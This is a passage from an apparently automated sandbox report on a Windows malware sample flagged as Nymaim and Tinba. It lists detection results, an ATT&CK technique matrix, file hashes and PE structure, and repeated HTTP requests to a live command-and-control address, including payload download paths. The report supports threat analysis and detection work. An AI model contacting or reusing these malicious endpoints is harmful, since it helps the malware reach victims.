                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0495D04A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0495D04A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0495A987 SetUnhandledExceptionFilter,0_2_0495A987
                Source: file.exe, file.exe, 00000000.00000002.4100040646.0000000000603000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: &Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A2EC cpuid 0_2_0040A2EC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00410822 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_00410822

                Stealing of Sensitive Information

                barindex
                Yara detected Nymaim
                Source: Yara matchFile source: 0.3.file.exe.4a40000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.4950e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.1656980225.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		1
                Process Injection                		341
                Virtualization/Sandbox Evasion                		OS Credential Dumping1
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading                		1
                Process Injection                		LSASS Memory771
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information                		Security Account Manager341
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive1
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
                Obfuscated Files or Information                		NTDS3
                Process Discovery                		Distributed Component Object ModelInput Capture11
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing                		LSA Secrets1
                Application Window Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain Credentials213
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe32%ReversingLabsWin32.Infostealer.Tinba
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubPj100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubfalse
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubPjfile.exe, 00000000.00000002.4100666631.0000000000C67000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  185.156.72.65
                  		unknownRussian Federation
                  		44636ITDELUXE-ASRUtrue

                  General Information

                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1565665
                  Start date and time:2024-11-30 13:50:07 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 7m 1s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:5
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:file.exe
                  Detection:MAL
                  Classification:mal100.troj.evad.winEXE@1/0@0/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:Failed
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • VT rate limit hit for: file.exe

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  07:51:25API Interceptor10787082x Sleep call for process: file.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  185.156.72.65file.exeGet hashmaliciousNymaimBrowse
                  • 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                  file.exeGet hashmaliciousNymaimBrowse
                  • 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                  file.exeGet hashmaliciousAmadey, NymaimBrowse
                  • 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                  file.exeGet hashmaliciousNymaimBrowse
                  • 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                  file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                  • 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, StealcBrowse
                  • 185.156.72.65/soft/download
                  file.exeGet hashmaliciousNymaimBrowse
                  • 185.156.72.65/soft/download
                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                  • 185.156.72.65/files/download
                  file.exeGet hashmaliciousNymaimBrowse
                  • 185.156.72.65/soft/download
                  file.exeGet hashmaliciousNymaimBrowse
                  • 185.156.72.65/soft/download

                  Domains

                  No context

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  ITDELUXE-ASRUfile.exeGet hashmaliciousNymaimBrowse
                  • 185.156.72.65
                  file.exeGet hashmaliciousNymaimBrowse
                  • 185.156.72.65
                  file.exeGet hashmaliciousAmadey, NymaimBrowse
                  • 185.156.72.65
                  file.exeGet hashmaliciousNymaimBrowse
                  • 185.156.72.65
                  file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                  • 185.156.72.65
                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, StealcBrowse
                  • 185.156.72.65
                  file.exeGet hashmaliciousNymaimBrowse
                  • 185.156.72.65
                  file.exeGet hashmaliciousNymaimBrowse
                  • 185.156.72.65
                  file.exeGet hashmaliciousNymaimBrowse
                  • 185.156.72.65
                  file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, XmrigBrowse
                  • 185.156.72.65

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  No created / dropped files found

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.948955755292811
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:file.exe
                  File size:2'029'568 bytes
                  MD5:c54023b84d77e5ce72a48eda24bbc227
                  SHA1:21c893f54354a48114c3d36e938f69f7d7f32430
                  SHA256:e2cee0f3aa497ae6990b9ff45110eaf89a95b31e34383ef8c655bf1a12544d43
                  SHA512:ad9d8a1df60fb4a3fbd4a1f3f16544eb41c59b642d9b81e00c50f0d3f4cc12b22fe07b70cefbaaa8bf02d076eb9039fbdac41e9cf2b73137e013ea9615b10bab
                  SSDEEP:24576:o8iiAa6PY9XMdXUFDbtM950HXWEcSouzyL34WTqfy+J4HQQS2alBekOJ0QqNRz7v:o8YwSdQouHXhcBr4AsUPegJTCz
                  TLSH:279533EF0733F7B1D648D4F6C1ADE01E7114297A5B894753D5A46FA00ABF2D31882AB8
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........RC..<...<...<.......<.......<.......<..~G...<...=.3.<.......<.......<.......<.Rich..<.........PE..L....[.d.................|.

                  File Icon

                  Icon Hash:cfa99b8a8651798d

                  Static PE Info

                  General

                  Entrypoint:0x8c4000
                  Entrypoint Section:.taggant
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:TERMINAL_SERVER_AWARE
                  Time Stamp:0x64C65B18 [Sun Jul 30 12:44:08 2023 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:0
                  File Version Major:5
                  File Version Minor:0
                  Subsystem Version Major:5
                  Subsystem Version Minor:0
                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                  Entrypoint Preview

                  Instruction
                  jmp 00007F7910887E4Ah

                  Rich Headers

                  Programming Language:
                  • [C++] VS2008 build 21022
                  • [ASM] VS2008 build 21022
                  • [ C ] VS2008 build 21022
                  • [IMP] VS2005 build 50727
                  • [RES] VS2008 build 21022
                  • [LNK] VS2008 build 21022

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x6f05b0x6f.idata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x660000x8234.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x4bedbc0x18cippurft
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  0x10000x650000x3ae00e0997b2adf8811fdfd04bb86ea98314bFalse0.9953100119426752data7.9437280014334295IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc0x660000x82340x3c006c7468eca8cf398f19d1b5cbc986ecadFalse0.926171875data7.716426009400757IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .idata 0x6f0000x10000x2006eb091ff88873fe4d3f846082d82dda4False0.154296875data1.0965193819233IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  0x700000x2a50000x200ce54b6444357e67d5ba43f6f78b8e676unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  cippurft0x3150000x1ae0000x1ad40011d34aa0c784965a37aa1c71500614beFalse0.9926368211269656data7.950859026244158IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  vcdmathy0x4c30000x10000x4003dca0fb7d06cf1a3c521fa0b826a0692False0.7587890625data6.008400388235224IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .taggant0x4c40000x30000x22005005f9ff2ed1ad6d699276831a85fbfbFalse0.06744025735294118DOS executable (COM)0.7981887477055756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                  Resources

                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  RT_CURSOR0x664600xea8data1.0029317697228144
                  RT_CURSOR0x673080x8a8data1.0049638989169676
                  RT_CURSOR0x67bb00x568data1.0079479768786128
                  RT_CURSOR0x681180xea8data1.0029317697228144
                  RT_CURSOR0x68fc00x8a8data1.0049638989169676
                  RT_CURSOR0x698680x568data0.5206521739130435
                  RT_ICON0x4bee1c0x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilIndia0.7557603686635944
                  RT_ICON0x4bee1c0x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilSri Lanka0.7557603686635944
                  RT_ICON0x4bf4e40x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TamilIndia0.6829875518672199
                  RT_ICON0x4bf4e40x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TamilSri Lanka0.6829875518672199
                  RT_ICON0x4c1a8c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TamilIndia0.8058510638297872
                  RT_ICON0x4c1a8c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TamilSri Lanka0.8058510638297872
                  RT_STRING0x6cea80x252emptyTamilIndia0
                  RT_STRING0x6cea80x252emptyTamilSri Lanka0
                  RT_STRING0x6d0fc0x396emptyTamilIndia0
                  RT_STRING0x6d0fc0x396emptyTamilSri Lanka0
                  RT_STRING0x6d4940x520emptyTamilIndia0
                  RT_STRING0x6d4940x520emptyTamilSri Lanka0
                  RT_STRING0x6d9b40x3eeemptyTamilIndia0
                  RT_STRING0x6d9b40x3eeemptyTamilSri Lanka0
                  RT_ACCELERATOR0x6dda40x58emptyTamilIndia0
                  RT_ACCELERATOR0x6dda40x58emptyTamilSri Lanka0
                  RT_GROUP_CURSOR0x6ddfc0x30empty0
                  RT_GROUP_CURSOR0x6de2c0x30empty0
                  RT_GROUP_ICON0x4c1ef40x30dataTamilIndia0.9375
                  RT_GROUP_ICON0x4c1ef40x30dataTamilSri Lanka0.9375
                  RT_VERSION0x4c1f240x254data0.5436241610738255
                  RT_MANIFEST0x4c21780x152ASCII text, with CRLF line terminators0.6479289940828402

                  Imports

                  DLLImport
                  kernel32.dlllstrcpy

                  Possible Origin

                  Language of compilation systemCountry where language is spokenMap
                  TamilIndia
                  TamilSri Lanka

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Nov 30, 2024 13:50:58.861622095 CET4973080192.168.2.4185.156.72.65
                  Nov 30, 2024 13:50:58.981722116 CET8049730185.156.72.65192.168.2.4
                  Nov 30, 2024 13:50:58.981813908 CET4973080192.168.2.4185.156.72.65
                  Nov 30, 2024 13:50:58.982016087 CET4973080192.168.2.4185.156.72.65
                  Nov 30, 2024 13:50:59.101989985 CET8049730185.156.72.65192.168.2.4
                  Nov 30, 2024 13:51:20.961652994 CET8049730185.156.72.65192.168.2.4
                  Nov 30, 2024 13:51:20.961720943 CET4973080192.168.2.4185.156.72.65
                  Nov 30, 2024 13:51:20.961838961 CET4973080192.168.2.4185.156.72.65
                  Nov 30, 2024 13:51:21.081727982 CET8049730185.156.72.65192.168.2.4
                  Nov 30, 2024 13:51:23.973067999 CET4973780192.168.2.4185.156.72.65
                  Nov 30, 2024 13:51:24.093346119 CET8049737185.156.72.65192.168.2.4
                  Nov 30, 2024 13:51:24.093436003 CET4973780192.168.2.4185.156.72.65
                  Nov 30, 2024 13:51:24.093640089 CET4973780192.168.2.4185.156.72.65
                  Nov 30, 2024 13:51:24.213660955 CET8049737185.156.72.65192.168.2.4
                  Nov 30, 2024 13:51:46.071523905 CET8049737185.156.72.65192.168.2.4
                  Nov 30, 2024 13:51:46.071630001 CET4973780192.168.2.4185.156.72.65
                  Nov 30, 2024 13:51:46.071716070 CET4973780192.168.2.4185.156.72.65
                  Nov 30, 2024 13:51:46.191739082 CET8049737185.156.72.65192.168.2.4
                  Nov 30, 2024 13:51:49.084491014 CET4973880192.168.2.4185.156.72.65
                  Nov 30, 2024 13:51:49.205034018 CET8049738185.156.72.65192.168.2.4
                  Nov 30, 2024 13:51:49.205132008 CET4973880192.168.2.4185.156.72.65
                  Nov 30, 2024 13:51:49.205323935 CET4973880192.168.2.4185.156.72.65
                  Nov 30, 2024 13:51:49.325320005 CET8049738185.156.72.65192.168.2.4
                  Nov 30, 2024 13:51:57.207779884 CET4973880192.168.2.4185.156.72.65
                  Nov 30, 2024 13:52:00.225203037 CET4974680192.168.2.4185.156.72.65
                  Nov 30, 2024 13:52:00.345340014 CET8049746185.156.72.65192.168.2.4
                  Nov 30, 2024 13:52:00.351130962 CET4974680192.168.2.4185.156.72.65
                  Nov 30, 2024 13:52:00.351347923 CET4974680192.168.2.4185.156.72.65
                  Nov 30, 2024 13:52:00.471234083 CET8049746185.156.72.65192.168.2.4
                  Nov 30, 2024 13:52:22.275265932 CET8049746185.156.72.65192.168.2.4
                  Nov 30, 2024 13:52:22.275402069 CET4974680192.168.2.4185.156.72.65
                  Nov 30, 2024 13:52:22.451685905 CET4974680192.168.2.4185.156.72.65
                  Nov 30, 2024 13:52:22.572339058 CET8049746185.156.72.65192.168.2.4
                  Nov 30, 2024 13:52:25.460973978 CET4980280192.168.2.4185.156.72.65
                  Nov 30, 2024 13:52:25.581233025 CET8049802185.156.72.65192.168.2.4
                  Nov 30, 2024 13:52:25.585403919 CET4980280192.168.2.4185.156.72.65
                  Nov 30, 2024 13:52:25.585403919 CET4980280192.168.2.4185.156.72.65
                  Nov 30, 2024 13:52:25.705533981 CET8049802185.156.72.65192.168.2.4
                  Nov 30, 2024 13:52:47.572606087 CET8049802185.156.72.65192.168.2.4
                  Nov 30, 2024 13:52:47.574140072 CET4980280192.168.2.4185.156.72.65
                  Nov 30, 2024 13:52:47.574265957 CET4980280192.168.2.4185.156.72.65
                  Nov 30, 2024 13:52:47.694185972 CET8049802185.156.72.65192.168.2.4
                  Nov 30, 2024 13:52:50.587126970 CET4985880192.168.2.4185.156.72.65
                  Nov 30, 2024 13:52:50.707456112 CET8049858185.156.72.65192.168.2.4
                  Nov 30, 2024 13:52:50.707537889 CET4985880192.168.2.4185.156.72.65
                  Nov 30, 2024 13:52:50.707751036 CET4985880192.168.2.4185.156.72.65
                  Nov 30, 2024 13:52:50.827682018 CET8049858185.156.72.65192.168.2.4
                  Nov 30, 2024 13:53:12.641942978 CET8049858185.156.72.65192.168.2.4
                  Nov 30, 2024 13:53:12.641999006 CET4985880192.168.2.4185.156.72.65
                  Nov 30, 2024 13:53:12.642245054 CET4985880192.168.2.4185.156.72.65
                  Nov 30, 2024 13:53:12.762222052 CET8049858185.156.72.65192.168.2.4
                  Nov 30, 2024 13:53:15.649194002 CET4991280192.168.2.4185.156.72.65
                  Nov 30, 2024 13:53:15.769603968 CET8049912185.156.72.65192.168.2.4
                  Nov 30, 2024 13:53:15.769798994 CET4991280192.168.2.4185.156.72.65
                  Nov 30, 2024 13:53:15.773116112 CET4991280192.168.2.4185.156.72.65
                  Nov 30, 2024 13:53:15.893094063 CET8049912185.156.72.65192.168.2.4
                  Nov 30, 2024 13:53:37.698534012 CET8049912185.156.72.65192.168.2.4
                  Nov 30, 2024 13:53:37.698594093 CET4991280192.168.2.4185.156.72.65
                  Nov 30, 2024 13:53:37.698892117 CET4991280192.168.2.4185.156.72.65
                  Nov 30, 2024 13:53:37.818815947 CET8049912185.156.72.65192.168.2.4
                  Nov 30, 2024 13:53:40.714103937 CET4996880192.168.2.4185.156.72.65
                  Nov 30, 2024 13:53:40.834227085 CET8049968185.156.72.65192.168.2.4
                  Nov 30, 2024 13:53:40.834340096 CET4996880192.168.2.4185.156.72.65
                  Nov 30, 2024 13:53:40.834578037 CET4996880192.168.2.4185.156.72.65
                  Nov 30, 2024 13:53:40.954474926 CET8049968185.156.72.65192.168.2.4
                  Nov 30, 2024 13:54:02.761421919 CET8049968185.156.72.65192.168.2.4
                  Nov 30, 2024 13:54:02.761487007 CET4996880192.168.2.4185.156.72.65
                  Nov 30, 2024 13:54:02.791908026 CET4996880192.168.2.4185.156.72.65
                  Nov 30, 2024 13:54:02.914076090 CET8049968185.156.72.65192.168.2.4
                  Nov 30, 2024 13:54:05.833141088 CET5001080192.168.2.4185.156.72.65
                  Nov 30, 2024 13:54:05.953269958 CET8050010185.156.72.65192.168.2.4
                  Nov 30, 2024 13:54:05.961144924 CET5001080192.168.2.4185.156.72.65
                  Nov 30, 2024 13:54:06.029354095 CET5001080192.168.2.4185.156.72.65
                  Nov 30, 2024 13:54:06.149507046 CET8050010185.156.72.65192.168.2.4
                  Nov 30, 2024 13:54:27.878072977 CET8050010185.156.72.65192.168.2.4
                  Nov 30, 2024 13:54:27.879211903 CET5001080192.168.2.4185.156.72.65
                  Nov 30, 2024 13:54:27.883130074 CET5001080192.168.2.4185.156.72.65
                  Nov 30, 2024 13:54:28.003077030 CET8050010185.156.72.65192.168.2.4
                  Nov 30, 2024 13:54:30.900934935 CET5001180192.168.2.4185.156.72.65
                  Nov 30, 2024 13:54:31.020848989 CET8050011185.156.72.65192.168.2.4
                  Nov 30, 2024 13:54:31.020929098 CET5001180192.168.2.4185.156.72.65
                  Nov 30, 2024 13:54:31.021220922 CET5001180192.168.2.4185.156.72.65
                  Nov 30, 2024 13:54:31.141073942 CET8050011185.156.72.65192.168.2.4
                  Nov 30, 2024 13:54:48.847842932 CET5001180192.168.2.4185.156.72.65
                  Nov 30, 2024 13:54:51.867111921 CET5001280192.168.2.4185.156.72.65
                  Nov 30, 2024 13:54:51.987261057 CET8050012185.156.72.65192.168.2.4
                  Nov 30, 2024 13:54:51.991251945 CET5001280192.168.2.4185.156.72.65
                  Nov 30, 2024 13:54:51.991610050 CET5001280192.168.2.4185.156.72.65
                  Nov 30, 2024 13:54:52.111536026 CET8050012185.156.72.65192.168.2.4

                  HTTP Request Dependency Graph

                  • 185.156.72.65

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.449730185.156.72.65805796C:\Users\user\Desktop\file.exe
                  TimestampBytes transferredDirectionData
                  Nov 30, 2024 13:50:58.982016087 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                  User-Agent: 1
                  Host: 185.156.72.65
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.449737185.156.72.65805796C:\Users\user\Desktop\file.exe
                  TimestampBytes transferredDirectionData
                  Nov 30, 2024 13:51:24.093640089 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                  User-Agent: 1
                  Host: 185.156.72.65
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.449738185.156.72.65805796C:\Users\user\Desktop\file.exe
                  TimestampBytes transferredDirectionData
                  Nov 30, 2024 13:51:49.205323935 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                  User-Agent: 1
                  Host: 185.156.72.65
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  3192.168.2.449746185.156.72.65805796C:\Users\user\Desktop\file.exe
                  TimestampBytes transferredDirectionData
                  Nov 30, 2024 13:52:00.351347923 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                  User-Agent: 1
                  Host: 185.156.72.65
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  4192.168.2.449802185.156.72.65805796C:\Users\user\Desktop\file.exe
                  TimestampBytes transferredDirectionData
                  Nov 30, 2024 13:52:25.585403919 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                  User-Agent: 1
                  Host: 185.156.72.65
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  5192.168.2.449858185.156.72.65805796C:\Users\user\Desktop\file.exe
                  TimestampBytes transferredDirectionData
                  Nov 30, 2024 13:52:50.707751036 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                  User-Agent: 1
                  Host: 185.156.72.65
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  6192.168.2.449912185.156.72.65805796C:\Users\user\Desktop\file.exe
                  TimestampBytes transferredDirectionData
                  Nov 30, 2024 13:53:15.773116112 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                  User-Agent: 1
                  Host: 185.156.72.65
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  7192.168.2.449968185.156.72.65805796C:\Users\user\Desktop\file.exe
